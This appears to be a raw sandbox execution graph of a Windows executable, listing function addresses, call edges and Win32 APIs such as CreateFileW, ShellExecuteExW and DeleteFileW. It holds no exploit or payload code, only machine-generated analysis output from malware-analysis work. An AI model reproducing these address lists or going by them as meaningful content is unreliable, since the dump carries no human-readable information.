20902->20893 20909 7ff7f4d927e8 EnterCriticalSection 20904->20909 20910->20886 20913 7ff7f4d690c6 20912->20913 20917 7ff7f4d68f5a 20912->20917 20920 7ff7f4d6353c 47 API calls 20913->20920 20914 7ff7f4d68f74 memcpy_s 20914->20836 20917->20914 20919 
7ff7f4d66edc 33 API calls 2 library calls 20917->20919 20919->20914 20922 7ff7f4d680ef 20921->20922 20936 7ff7f4d680e8 20921->20936 20924 7ff7f4d612bc 33 API calls 20922->20924 20923 7ff7f4d85bf0 _handle_error 8 API calls 20925 7ff7f4d658f3 20923->20925 20926 7ff7f4d6811a 20924->20926 20925->20845 20925->20846 20927 7ff7f4d6836b 20926->20927 20928 7ff7f4d6813a 20926->20928 20929 7ff7f4d67a28 35 API calls 20927->20929 20930 7ff7f4d68154 20928->20930 20954 7ff7f4d681ed 20928->20954 20933 7ff7f4d6838a 20929->20933 20931 7ff7f4d6874f 20930->20931 20994 7ff7f4d67050 20930->20994 21007 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20931->21007 20934 7ff7f4d68593 20933->20934 20939 7ff7f4d683bf 20933->20939 20992 7ff7f4d681e8 20933->20992 20938 7ff7f4d68773 20934->20938 20943 7ff7f4d67050 4 API calls 20934->20943 20935 7ff7f4d68755 20945 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20935->20945 20936->20923 21010 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20938->21010 20944 7ff7f4d68761 20939->20944 20950 7ff7f4d67050 4 API calls 20939->20950 20940 7ff7f4d68779 20946 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20940->20946 20942 7ff7f4d681a7 20955 7ff7f4d61b70 31 API calls 20942->20955 20960 7ff7f4d681b9 memcpy_s 20942->20960 20948 7ff7f4d685fa 20943->20948 21008 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 20944->21008 20952 7ff7f4d6875b 20945->20952 20953 7ff7f4d6877f 20946->20953 20947 7ff7f4d6874a 20951 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20947->20951 21005 7ff7f4d611ec 33 API calls memcpy_s 20948->21005 20969 7ff7f4d6841a memcpy_s 20950->20969 20951->20931 20962 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20952->20962 20964 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20953->20964 20959 7ff7f4d612bc 33 API calls 20954->20959 20954->20992 20955->20960 20957 7ff7f4d68767 20967 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 20957->20967 20958 
7ff7f4d61b70 31 API calls 20958->20992 20965 7ff7f4d68262 20959->20965 20960->20958 20961 7ff7f4d6860d 21006 7ff7f4d66d64 33 API calls memcpy_s 20961->21006 20962->20944 20963 7ff7f4d61b70 31 API calls 20978 7ff7f4d68499 20963->20978 20970 7ff7f4d68785 20964->20970 21002 7ff7f4d66dd8 33 API calls 20965->21002 20968 7ff7f4d6876d 20967->20968 21009 7ff7f4d6353c 47 API calls 20968->21009 20969->20957 20969->20963 20972 7ff7f4d68277 21003 7ff7f4d652c0 33 API calls 2 library calls 20972->21003 20974 7ff7f4d61b70 31 API calls 20977 7ff7f4d68690 20974->20977 20976 7ff7f4d6861d memcpy_s 20976->20953 20976->20974 20979 7ff7f4d61b70 31 API calls 20977->20979 20983 7ff7f4d684c5 20978->20983 21004 7ff7f4d61734 33 API calls 4 library calls 20978->21004 20982 7ff7f4d6869a 20979->20982 20981 7ff7f4d61b70 31 API calls 20986 7ff7f4d68311 20981->20986 20987 7ff7f4d61b70 31 API calls 20982->20987 20983->20968 20984 7ff7f4d612bc 33 API calls 20983->20984 20988 7ff7f4d68566 20984->20988 20985 7ff7f4d6828d memcpy_s 20985->20952 20985->20981 20989 7ff7f4d61b70 31 API calls 20986->20989 20987->20992 20990 7ff7f4d61c04 33 API calls 20988->20990 20989->20992 20991 7ff7f4d68583 20990->20991 20993 7ff7f4d61b70 31 API calls 20991->20993 20992->20935 20992->20936 20992->20940 20992->20947 20993->20992 20995 7ff7f4d6709d 20994->20995 20996 7ff7f4d670b2 memcpy_s 20994->20996 20995->20996 20997 7ff7f4d6715d 20995->20997 21000 7ff7f4d670e4 20995->21000 20996->20942 21011 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 20997->21011 21000->20996 21001 7ff7f4d85aa0 4 API calls 21000->21001 21001->20996 21002->20972 21003->20985 21004->20983 21005->20961 21006->20976 21019 7ff7f4d69a38 21012->21019 21015 7ff7f4d69bd9 21017 7ff7f4d85bf0 _handle_error 8 API calls 21015->21017 21018 7ff7f4d69bf2 21017->21018 21018->20861 21018->20862 21020 7ff7f4d69a92 21019->21020 21028 7ff7f4d69b30 21019->21028 21022 7ff7f4d69ac0 21020->21022 21033 7ff7f4d70644 
WideCharToMultiByte 21020->21033 21027 7ff7f4d69aef 21022->21027 21035 7ff7f4d6ae88 45 API calls 2 library calls 21022->21035 21023 7ff7f4d85bf0 _handle_error 8 API calls 21024 7ff7f4d69b64 21023->21024 21024->21015 21029 7ff7f4d69c00 21024->21029 21036 7ff7f4d8d5ec 31 API calls 2 library calls 21027->21036 21028->21023 21030 7ff7f4d69c69 21029->21030 21031 7ff7f4d69c40 21029->21031 21030->21015 21037 7ff7f4d8d5ec 31 API calls 2 library calls 21031->21037 21034 7ff7f4d70686 21033->21034 21034->21022 21035->21027 21036->21028 21037->21030 21054 7ff7f4d6d3f8 21038->21054 21043 7ff7f4d6d8cb 21046 7ff7f4d6d93f 21043->21046 21048 7ff7f4d6d967 21043->21048 21044 7ff7f4d6d80d swprintf 21051 7ff7f4d6d89c 21044->21051 21068 7ff7f4d8d308 21044->21068 21095 7ff7f4d63550 33 API calls 21044->21095 21047 7ff7f4d85bf0 _handle_error 8 API calls 21046->21047 21049 7ff7f4d6d953 21047->21049 21050 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21048->21050 21049->20799 21052 7ff7f4d6d96c 21050->21052 21051->21043 21096 7ff7f4d63550 33 API calls 21051->21096 21055 7ff7f4d6d58d 21054->21055 21057 7ff7f4d6d42a 21054->21057 21058 7ff7f4d6ca18 21055->21058 21056 7ff7f4d61734 33 API calls 21056->21057 21057->21055 21057->21056 21059 7ff7f4d6ca4e 21058->21059 21065 7ff7f4d6cb18 21058->21065 21062 7ff7f4d6cab8 21059->21062 21063 7ff7f4d6cb13 21059->21063 21067 7ff7f4d6ca5e 21059->21067 21066 7ff7f4d85aa0 4 API calls 21062->21066 21062->21067 21097 7ff7f4d61b50 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 21063->21097 21098 7ff7f4d61bd4 33 API calls std::_Xinvalid_argument 21065->21098 21066->21067 21067->21044 21069 7ff7f4d8d366 21068->21069 21070 7ff7f4d8d34e 21068->21070 21069->21070 21071 7ff7f4d8d370 21069->21071 21099 7ff7f4d90b6c 15 API calls _set_errno_from_matherr 21070->21099 21101 7ff7f4d8b308 35 API calls 2 library calls 21071->21101 21074 7ff7f4d8d353 21100 7ff7f4d8ae34 31 API calls _invalid_parameter_noinfo_noreturn 
21074->21100 21076 7ff7f4d85bf0 _handle_error 8 API calls 21078 7ff7f4d8d523 21076->21078 21077 7ff7f4d8d381 memcpy_s 21102 7ff7f4d8b288 15 API calls _set_errno_from_matherr 21077->21102 21078->21044 21080 7ff7f4d8d3ec 21103 7ff7f4d8b710 46 API calls 3 library calls 21080->21103 21082 7ff7f4d8d3f5 21083 7ff7f4d8d42c 21082->21083 21084 7ff7f4d8d3fd 21082->21084 21086 7ff7f4d8d4aa 21083->21086 21087 7ff7f4d8d43b 21083->21087 21088 7ff7f4d8d432 21083->21088 21089 7ff7f4d8d484 21083->21089 21104 7ff7f4d90ddc 21084->21104 21086->21089 21090 7ff7f4d8d4b4 21086->21090 21091 7ff7f4d90ddc __free_lconv_mon 15 API calls 21087->21091 21088->21087 21088->21089 21092 7ff7f4d90ddc __free_lconv_mon 15 API calls 21089->21092 21093 7ff7f4d90ddc __free_lconv_mon 15 API calls 21090->21093 21094 7ff7f4d8d35e 21091->21094 21092->21094 21093->21094 21094->21076 21095->21044 21096->21043 21099->21074 21100->21094 21101->21077 21102->21080 21103->21082 21105 7ff7f4d90de1 RtlRestoreThreadPreferredUILanguages 21104->21105 21109 7ff7f4d90e11 __free_lconv_mon 21104->21109 21106 7ff7f4d90dfc 21105->21106 21105->21109 21110 7ff7f4d90b6c 15 API calls _set_errno_from_matherr 21106->21110 21108 7ff7f4d90e01 GetLastError 21108->21109 21109->21094 21110->21108 21113->20599 21117 7ff7f4d7c24b SizeofResource 21116->21117 21121 7ff7f4d7c397 21116->21121 21118 7ff7f4d7c265 LoadResource 21117->21118 21117->21121 21119 7ff7f4d7c27e LockResource 21118->21119 21118->21121 21120 7ff7f4d7c293 GlobalAlloc 21119->21120 21119->21121 21120->21121 21122 7ff7f4d7c2b4 GlobalLock 21120->21122 21121->20636 21123 7ff7f4d7c38e GlobalFree 21122->21123 21125 7ff7f4d7c2c6 memcpy_s 21122->21125 21123->21121 21124 7ff7f4d7c385 GlobalUnlock 21124->21123 21125->21124 21126 7ff7f4d7c356 GdipCreateHBITMAPFromBitmap 21125->21126 21127 7ff7f4d7c36e 21125->21127 21126->21127 21127->21124 21129 7ff7f4d7c11c 4 API calls 21128->21129 21130 7ff7f4d7c0fa 21129->21130 21131 7ff7f4d7c109 21130->21131 21139 7ff7f4d7c154 GetDC GetDeviceCaps 
GetDeviceCaps ReleaseDC 21130->21139 21131->20642 21131->20643 21131->20644 21133->20647 21135 7ff7f4d7c12e 21134->21135 21136 7ff7f4d7c133 21134->21136 21140 7ff7f4d7c18c GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 21135->21140 21138 7ff7f4d7c9f0 16 API calls _handle_error 21136->21138 21138->20652 21139->21131 21140->21136 21144 7ff7f4d69cfe _snwprintf 21141->21144 21142 7ff7f4d69d73 21259 7ff7f4d6806c 48 API calls 21142->21259 21144->21142 21146 7ff7f4d69e89 21144->21146 21145 7ff7f4d61b70 31 API calls 21148 7ff7f4d69dfd 21145->21148 21146->21148 21151 7ff7f4d61c80 33 API calls 21146->21151 21147 7ff7f4d69d7d memcpy_s 21147->21145 21149 7ff7f4d6a82e 21147->21149 21210 7ff7f4d646a0 21148->21210 21150 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21149->21150 21152 7ff7f4d6a834 21150->21152 21151->21148 21156 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21152->21156 21155 7ff7f4d69e22 21158 7ff7f4d6424c 100 API calls 21155->21158 21159 7ff7f4d6a83a 21156->21159 21157 7ff7f4d69f17 21228 7ff7f4d8d7c0 21157->21228 21160 7ff7f4d69e2b 21158->21160 21160->21152 21163 7ff7f4d69e66 21160->21163 21162 7ff7f4d69ead 21162->21157 21168 7ff7f4d69254 33 API calls 21162->21168 21166 7ff7f4d85bf0 _handle_error 8 API calls 21163->21166 21165 7ff7f4d8d7c0 31 API calls 21179 7ff7f4d69f57 __vcrt_FlsAlloc 21165->21179 21167 7ff7f4d6a80e 21166->21167 21167->20655 21168->21162 21169 7ff7f4d6a089 21171 7ff7f4d64c40 101 API calls 21169->21171 21182 7ff7f4d6a15c 21169->21182 21173 7ff7f4d6a0a1 21171->21173 21174 7ff7f4d64a70 104 API calls 21173->21174 21173->21182 21180 7ff7f4d6a0c9 21174->21180 21179->21169 21179->21182 21236 7ff7f4d64d50 21179->21236 21245 7ff7f4d64a70 21179->21245 21250 7ff7f4d64c40 21179->21250 21180->21182 21203 7ff7f4d6a0d7 __vcrt_FlsAlloc 21180->21203 21260 7ff7f4d702f8 MultiByteToWideChar 21180->21260 21255 7ff7f4d6424c 21182->21255 21183 7ff7f4d6a5ec 21193 7ff7f4d6a6c2 21183->21193 21266 7ff7f4d90458 31 API calls 2 library calls 
21183->21266 21185 7ff7f4d6a557 21185->21183 21263 7ff7f4d90458 31 API calls 2 library calls 21185->21263 21188 7ff7f4d6a54b 21188->20655 21189 7ff7f4d6a6ae 21189->21193 21268 7ff7f4d690cc 33 API calls Concurrency::cancel_current_task 21189->21268 21190 7ff7f4d6a649 21267 7ff7f4d8ec84 31 API calls _invalid_parameter_noinfo_noreturn 21190->21267 21191 7ff7f4d6a7a2 21192 7ff7f4d8d7c0 31 API calls 21191->21192 21195 7ff7f4d6a7cb 21192->21195 21193->21191 21199 7ff7f4d69254 33 API calls 21193->21199 21197 7ff7f4d8d7c0 31 API calls 21195->21197 21196 7ff7f4d6a56d 21264 7ff7f4d8ec84 31 API calls _invalid_parameter_noinfo_noreturn 21196->21264 21197->21182 21199->21193 21200 7ff7f4d6a5d8 21200->21183 21265 7ff7f4d690cc 33 API calls Concurrency::cancel_current_task 21200->21265 21202 7ff7f4d6a829 21269 7ff7f4d85db4 8 API calls 21202->21269 21203->21182 21203->21183 21203->21185 21203->21188 21203->21202 21205 7ff7f4d70644 WideCharToMultiByte 21203->21205 21261 7ff7f4d6ae88 45 API calls 2 library calls 21203->21261 21262 7ff7f4d8d5ec 31 API calls 2 library calls 21203->21262 21205->21203 21209 7ff7f4d6a868 21208->21209 21209->20657 21211 7ff7f4d646dd CreateFileW 21210->21211 21213 7ff7f4d6478e GetLastError 21211->21213 21221 7ff7f4d6484e 21211->21221 21214 7ff7f4d680b0 49 API calls 21213->21214 21215 7ff7f4d647bc 21214->21215 21216 7ff7f4d647c0 CreateFileW GetLastError 21215->21216 21222 7ff7f4d6480c 21215->21222 21216->21222 21217 7ff7f4d64891 SetFileTime 21220 7ff7f4d648af 21217->21220 21218 7ff7f4d648e8 21219 7ff7f4d85bf0 _handle_error 8 API calls 21218->21219 21223 7ff7f4d648fb 21219->21223 21220->21218 21224 7ff7f4d61c80 33 API calls 21220->21224 21221->21217 21221->21220 21222->21221 21225 7ff7f4d64916 21222->21225 21223->21155 21223->21162 21224->21218 21226 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21225->21226 21227 7ff7f4d6491b 21226->21227 21229 7ff7f4d8d7ed 21228->21229 21235 7ff7f4d8d802 21229->21235 21270 7ff7f4d90b6c 15 API calls 
_set_errno_from_matherr 21229->21270 21231 7ff7f4d8d7f7 21271 7ff7f4d8ae34 31 API calls _invalid_parameter_noinfo_noreturn 21231->21271 21232 7ff7f4d85bf0 _handle_error 8 API calls 21234 7ff7f4d69f37 21232->21234 21234->21165 21235->21232 21237 7ff7f4d64d6d 21236->21237 21238 7ff7f4d64d89 21236->21238 21239 7ff7f4d64d9b 21237->21239 21272 7ff7f4d63eac 99 API calls Concurrency::cancel_current_task 21237->21272 21238->21239 21240 7ff7f4d64da1 SetFilePointer 21238->21240 21239->21179 21240->21239 21242 7ff7f4d64dbe GetLastError 21240->21242 21242->21239 21243 7ff7f4d64dc8 21242->21243 21243->21239 21273 7ff7f4d63eac 99 API calls Concurrency::cancel_current_task 21243->21273 21246 7ff7f4d64a9d 21245->21246 21247 7ff7f4d64a96 21245->21247 21246->21247 21249 7ff7f4d64520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21246->21249 21274 7ff7f4d63d8c 99 API calls Concurrency::cancel_current_task 21246->21274 21247->21179 21249->21246 21275 7ff7f4d6491c 21250->21275 21253 7ff7f4d64c67 21253->21179 21256 7ff7f4d64266 21255->21256 21257 7ff7f4d64272 21255->21257 21256->21257 21283 7ff7f4d642d0 21256->21283 21259->21147 21260->21203 21261->21203 21262->21203 21263->21196 21264->21200 21265->21183 21266->21190 21267->21189 21268->21193 21269->21149 21270->21231 21271->21235 21279 7ff7f4d6492d _snwprintf 21275->21279 21276 7ff7f4d64959 21278 7ff7f4d85bf0 _handle_error 8 API calls 21276->21278 21277 7ff7f4d64a34 SetFilePointer 21277->21276 21281 7ff7f4d64a5c GetLastError 21277->21281 21280 7ff7f4d649c1 21278->21280 21279->21276 21279->21277 21280->21253 21282 7ff7f4d63eac 99 API calls Concurrency::cancel_current_task 21280->21282 21281->21276 21284 7ff7f4d642ea 21283->21284 21285 7ff7f4d64302 21283->21285 21284->21285 21287 7ff7f4d642f6 FindCloseChangeNotification 21284->21287 21286 7ff7f4d64326 21285->21286 21289 7ff7f4d63a64 99 API calls 21285->21289 21286->21257 21287->21285 21289->21286 21290->20663 21292->20677 21426 7ff7f4d79c09 8 API calls _handle_error 21446 
7ff7f4d84d10 21448 7ff7f4d84c43 21446->21448 21447 7ff7f4d85350 _com_raise_error 14 API calls 21447->21448 21448->21447 21463 7ff7f4d700dc 21464 7ff7f4d83c58 21463->21464 21465 7ff7f4d83c97 21464->21465 21466 7ff7f4d83d0f 21464->21466 21467 7ff7f4d6aee0 48 API calls 21465->21467 21468 7ff7f4d6aee0 48 API calls 21466->21468 21469 7ff7f4d83cab 21467->21469 21470 7ff7f4d83d23 21468->21470 21471 7ff7f4d6d9c0 48 API calls 21469->21471 21472 7ff7f4d6d9c0 48 API calls 21470->21472 21476 7ff7f4d83cba memcpy_s 21471->21476 21472->21476 21473 7ff7f4d61b70 31 API calls 21474 7ff7f4d83db9 21473->21474 21489 7ff7f4d6210c 21474->21489 21475 7ff7f4d83e44 21480 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21475->21480 21476->21473 21476->21475 21477 7ff7f4d83e3e 21476->21477 21479 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21477->21479 21479->21475 21482 7ff7f4d83e4a 21480->21482 21490 7ff7f4d62113 21489->21490 21491 7ff7f4d62116 SetDlgItemTextW 21489->21491 21490->21491 22720 7ff7f4d99af0 22721 7ff7f4d99b0e 22720->22721 22722 7ff7f4d87808 Concurrency::cancel_current_task 2 API calls 22721->22722 22723 7ff7f4d99b17 22722->22723 22736 7ff7f4d70d48 31 API calls 22723->22736 22725 7ff7f4d99b3c 22726 7ff7f4d87808 Concurrency::cancel_current_task 2 API calls 22725->22726 22727 7ff7f4d99b5c 22726->22727 22737 7ff7f4d70d7c 31 API calls 22727->22737 22729 7ff7f4d99b7b 22738 7ff7f4d722b0 22729->22738 22736->22725 22737->22729 22739 7ff7f4d722c7 22738->22739 22740 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22739->22740 22741 7ff7f4d722f0 22740->22741 22742 7ff7f4d612bc 33 API calls 22741->22742 22743 7ff7f4d723c7 22742->22743 22744 7ff7f4d700d0 83 API calls 22743->22744 22745 7ff7f4d723db 22744->22745 22746 7ff7f4d61b70 31 API calls 22745->22746 22747 7ff7f4d723e5 22746->22747 22748 7ff7f4d85aa0 4 API calls 22747->22748 22749 7ff7f4d72449 22748->22749 22754 7ff7f4d71294 31 API calls 22749->22754 22751 7ff7f4d73d62 22755 7ff7f4d71a38 31 API 
calls _invalid_parameter_noinfo_noreturn 22751->22755 22753 7ff7f4d73d7a 22754->22751 22755->22753 22939 7ff7f4d84ef2 22940 7ff7f4d85350 _com_raise_error 14 API calls 22939->22940 22941 7ff7f4d84f31 22940->22941 21296 7ff7f4d747b8 21309 7ff7f4d68e0c 21296->21309 21300 7ff7f4d748d1 21302 7ff7f4d85bf0 _handle_error 8 API calls 21300->21302 21301 7ff7f4d7482e 21301->21300 21303 7ff7f4d748fe 21301->21303 21304 7ff7f4d748f9 21301->21304 21305 7ff7f4d748e4 21302->21305 21306 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21303->21306 21307 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21304->21307 21308 7ff7f4d74904 21306->21308 21307->21303 21310 7ff7f4d68e49 21309->21310 21312 7ff7f4d68e32 21309->21312 21320 7ff7f4d63550 33 API calls 21310->21320 21313 7ff7f4d66288 21312->21313 21321 7ff7f4d6885c 21313->21321 21316 7ff7f4d662cf 21316->21301 21319 7ff7f4d662ba FindClose 21319->21316 21320->21312 21322 7ff7f4d6887a 21321->21322 21351 7ff7f4d6367c 21322->21351 21325 7ff7f4d6647c 21326 7ff7f4d664b9 FindFirstFileW 21325->21326 21327 7ff7f4d66592 FindNextFileW 21325->21327 21329 7ff7f4d665b3 21326->21329 21331 7ff7f4d664de 21326->21331 21327->21329 21330 7ff7f4d665a1 GetLastError 21327->21330 21332 7ff7f4d665d1 21329->21332 21335 7ff7f4d61c80 33 API calls 21329->21335 21349 7ff7f4d66580 21330->21349 21333 7ff7f4d680b0 49 API calls 21331->21333 21340 7ff7f4d612bc 33 API calls 21332->21340 21334 7ff7f4d66504 21333->21334 21337 7ff7f4d66508 FindFirstFileW 21334->21337 21338 7ff7f4d66527 21334->21338 21335->21332 21336 7ff7f4d85bf0 _handle_error 8 API calls 21339 7ff7f4d662b4 21336->21339 21337->21338 21338->21329 21342 7ff7f4d6656f GetLastError 21338->21342 21344 7ff7f4d666d4 21338->21344 21339->21316 21339->21319 21341 7ff7f4d665fb 21340->21341 21343 7ff7f4d68dc4 47 API calls 21341->21343 21342->21349 21345 7ff7f4d66609 21343->21345 21346 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 21344->21346 21348 7ff7f4d666cf 21345->21348 
[Execution graph residue: the control-flow/call graph of the sample's executed functions (node ids, image addresses in the range 0x7ff7f4d6xxxx to 0x7ff7f4dcxxxx, and src->dst edges) was flattened into the text and is not reproduced here. Recoverable information from the graph labels follows.]

Win32 APIs referenced by the executed functions:
- Loader / memory / exceptions: LoadLibraryExA, FreeLibrary, GetProcAddress, GetModuleHandleW, GetLastError, RaiseException, RtlPcToFileHeader, VirtualProtect, VirtualQuery, GetSystemInfo
- Files and directories: CreateFileW, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, CloseHandle, FindFirstFileW, FindClose, MoveFileW, MoveFileExW, DeleteFileW, CreateDirectoryW, SetFileAttributesW, SetCurrentDirectoryW, GetTempPathW
- Process / timing: ShellExecuteExW, WaitForSingleObject, GetExitCodeProcess, GetCommandLineW, Sleep, GetTickCount
- Dialog and window handling: IsDlgButtonChecked, SendDlgItemMessageW, GetDlgItem, SetDlgItemTextW, EndDialog, SetFocus, EnableWindow, ShowWindow, GetMessageW, PeekMessageW, IsDialogMessageW, TranslateMessage, DispatchMessageW, GetWindow, GetWindowLongPtrW, SetWindowLongPtrW, GetWindowRect, GetClientRect, GetWindowTextLengthW, GetWindowTextW, GetClassNameW, GetSystemMetrics, GetDC, ReleaseDC, GetDeviceCaps, GetObjectW, DeleteObject
- Strings: CompareStringW, WideCharToMultiByte, swprintf, _snwprintf, memcpy_s

Runtime helpers referenced: _invalid_parameter_noinfo_noreturn, _handle_error, _com_error::_com_error, Concurrency::cancel_current_task, std::bad_alloc::bad_alloc, std::_Xinvalid_argument, shared_ptr, and the delay-load helpers DloadAcquireSectionWriteAccess, DloadReleaseSectionWriteAccess, DloadProtectSection.
22516->22518 22517 7ff7f4d79dc0 22517->22516 22522 7ff7f4d64c40 101 API calls 22517->22522 22519 7ff7f4d77757 22518->22519 22525 7ff7f4d645f0 22519->22525 22520 7ff7f4d79df6 22523 7ff7f4d64a70 104 API calls 22520->22523 22521->22517 22522->22520 22523->22516 22524->22515 22530 7ff7f4d64d50 101 API calls 22525->22530 22526 7ff7f4d6460f 22531 7ff7f4d64c40 101 API calls 22526->22531 22527 7ff7f4d64628 22532 7ff7f4d64d50 101 API calls 22527->22532 22528 7ff7f4d64638 22533 7ff7f4d64c40 101 API calls 22528->22533 22529 7ff7f4d64651 22534 7ff7f4d7717c 22529->22534 22530->22526 22531->22527 22532->22528 22533->22529 22535 7ff7f4d771be 22534->22535 22536 7ff7f4d77252 22534->22536 22537 7ff7f4d75384 120 API calls 22535->22537 22539 7ff7f4d772be 22536->22539 22551 7ff7f4d64c40 101 API calls 22536->22551 22545 7ff7f4d771e9 22537->22545 22538 7ff7f4d77295 22550 7ff7f4d64d50 101 API calls 22538->22550 22544 7ff7f4d75384 120 API calls 22539->22544 22539->22545 22549 7ff7f4d7741b 22539->22549 22540 7ff7f4d74ff4 120 API calls 22547 7ff7f4d77456 22540->22547 22541 7ff7f4d772a9 22566 7ff7f4d75384 22541->22566 22543 7ff7f4d85bf0 _handle_error 8 API calls 22546 7ff7f4d77514 22543->22546 22544->22539 22545->22540 22545->22549 22546->22464 22552 7ff7f4d77f24 22546->22552 22547->22549 22594 7ff7f4d76f94 22547->22594 22549->22543 22550->22541 22551->22538 22553 7ff7f4d777af 22552->22553 22554 7ff7f4d77f38 22552->22554 22553->22464 22553->22477 22554->22553 22684 7ff7f4d74a60 22554->22684 22559 7ff7f4d750c0 22558->22559 22561 7ff7f4d7501c memcpy_s 22558->22561 22559->22481 22559->22484 22560 7ff7f4d75384 120 API calls 22560->22561 22561->22559 22561->22560 22562 7ff7f4d750a6 22561->22562 22714 7ff7f4d63dc4 99 API calls 22562->22714 22564->22464 22565->22512 22593 7ff7f4d64a70 104 API calls 22566->22593 22567 7ff7f4d85bf0 _handle_error 8 API calls 22568 7ff7f4d7563b 22567->22568 22568->22539 22569 7ff7f4d753d0 22570 7ff7f4d66288 55 API calls 22569->22570 22582 7ff7f4d755e9 22569->22582 22571 
7ff7f4d7544b 22570->22571 22572 7ff7f4d754c9 22571->22572 22573 7ff7f4d75473 22571->22573 22574 7ff7f4d754c7 22572->22574 22576 7ff7f4d71d98 64 API calls 22572->22576 22573->22574 22601 7ff7f4d71bbc 22573->22601 22577 7ff7f4d74e30 107 API calls 22574->22577 22576->22574 22580 7ff7f4d75503 22577->22580 22578 7ff7f4d75484 22579 7ff7f4d612bc 33 API calls 22578->22579 22581 7ff7f4d754bb 22579->22581 22583 7ff7f4d612bc 33 API calls 22580->22583 22592 7ff7f4d75557 22580->22592 22632 7ff7f4d68d18 22581->22632 22582->22567 22587 7ff7f4d75543 22583->22587 22585 7ff7f4d75657 22586 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22585->22586 22588 7ff7f4d7565c 22586->22588 22648 7ff7f4d700d0 22587->22648 22590 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22588->22590 22591 7ff7f4d75662 22590->22591 22592->22582 22592->22585 22592->22588 22593->22569 22680 7ff7f4d77c90 22594->22680 22597 7ff7f4d74ff4 120 API calls 22600 7ff7f4d77003 22597->22600 22598 7ff7f4d85bf0 _handle_error 8 API calls 22599 7ff7f4d7715b 22598->22599 22599->22549 22600->22598 22664 7ff7f4d67af8 47 API calls 22601->22664 22603 7ff7f4d71bf6 22604 7ff7f4d612bc 33 API calls 22603->22604 22605 7ff7f4d71c22 22604->22605 22665 7ff7f4d70a5c CompareStringW 22605->22665 22607 7ff7f4d71c4a 22609 7ff7f4d612bc 33 API calls 22607->22609 22610 7ff7f4d71ca4 22607->22610 22608 7ff7f4d71d43 22612 7ff7f4d61b70 31 API calls 22608->22612 22611 7ff7f4d71c79 22609->22611 22610->22608 22615 7ff7f4d71d8f 22610->22615 22616 7ff7f4d71d8a 22610->22616 22666 7ff7f4d70a8c CompareStringW 22611->22666 22614 7ff7f4d71d62 22612->22614 22617 7ff7f4d85bf0 _handle_error 8 API calls 22614->22617 22618 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22615->22618 22621 7ff7f4d8ae54 _invalid_parameter_noinfo_noreturn 31 API calls 22616->22621 22620 7ff7f4d71d71 22617->22620 22619 7ff7f4d71d95 22618->22619 22622 7ff7f4d71bbc 64 API calls 22619->22622 22620->22578 22621->22615 22623 7ff7f4d71dc1 
22622->22623 22624 7ff7f4d661e8 swprintf 46 API calls 22623->22624 22625 7ff7f4d71df2 22624->22625 22626 7ff7f4d612bc 33 API calls 22625->22626 22627 7ff7f4d71e1d 22626->22627 22628 7ff7f4d68d18 47 API calls 22627->22628 22629 7ff7f4d71e2a 22628->22629 22630 7ff7f4d85bf0 _handle_error 8 API calls 22629->22630 22631 7ff7f4d71e3a 22630->22631 22631->22578 22633 7ff7f4d68d41 22632->22633 22634 7ff7f4d68d4d 22633->22634 22635 7ff7f4d68dbe 22633->22635 22636 7ff7f4d66e5c 33 API calls 22634->22636 22667 7ff7f4d6353c 47 API calls 22635->22667 22638 7ff7f4d68d78 22636->22638 22649 7ff7f4d83bb8 22648->22649 22650 7ff7f4d68b28 47 API calls 22649->22650 22651 7ff7f4d83beb 22650->22651 22652 7ff7f4d6aee0 48 API calls 22651->22652 22653 7ff7f4d83bff 22652->22653 22654 7ff7f4d6d9c0 48 API calls 22653->22654 22655 7ff7f4d83c0f 22654->22655 22656 7ff7f4d61b70 31 API calls 22655->22656 22657 7ff7f4d83c1a 22656->22657 22668 7ff7f4d8372c 22657->22668 22664->22603 22665->22607 22666->22610 22669 7ff7f4d83758 22668->22669 22670 7ff7f4d612bc 33 API calls 22669->22670 22671 7ff7f4d83768 22670->22671 22672 7ff7f4d82bb4 24 API calls 22671->22672 22674 7ff7f4d83775 22672->22674 22673 7ff7f4d837af 22674->22673 22682 7ff7f4d77ce5 memcpy_s 22680->22682 22681 7ff7f4d76fd7 22681->22597 22681->22600 22682->22681 22683 7ff7f4d64c40 101 API calls 22682->22683 22683->22682 22685 7ff7f4d74a9a 22684->22685 22698 7ff7f4d74a93 22684->22698 22686 7ff7f4d74ad8 22685->22686 22688 7ff7f4d74b20 22685->22688 22694 7ff7f4d74aa7 22685->22694 22690 7ff7f4d75214 103 API calls 22686->22690 22687 7ff7f4d85bf0 _handle_error 8 API calls 22689 7ff7f4d74d1d 22687->22689 22711 7ff7f4d746d8 33 API calls memcpy_s 22688->22711 22689->22553 22710 7ff7f4d63834 82 API calls 2 library calls 22689->22710 22690->22698 22692 7ff7f4d74b61 22693 7ff7f4d74ff4 120 API calls 22692->22693 22703 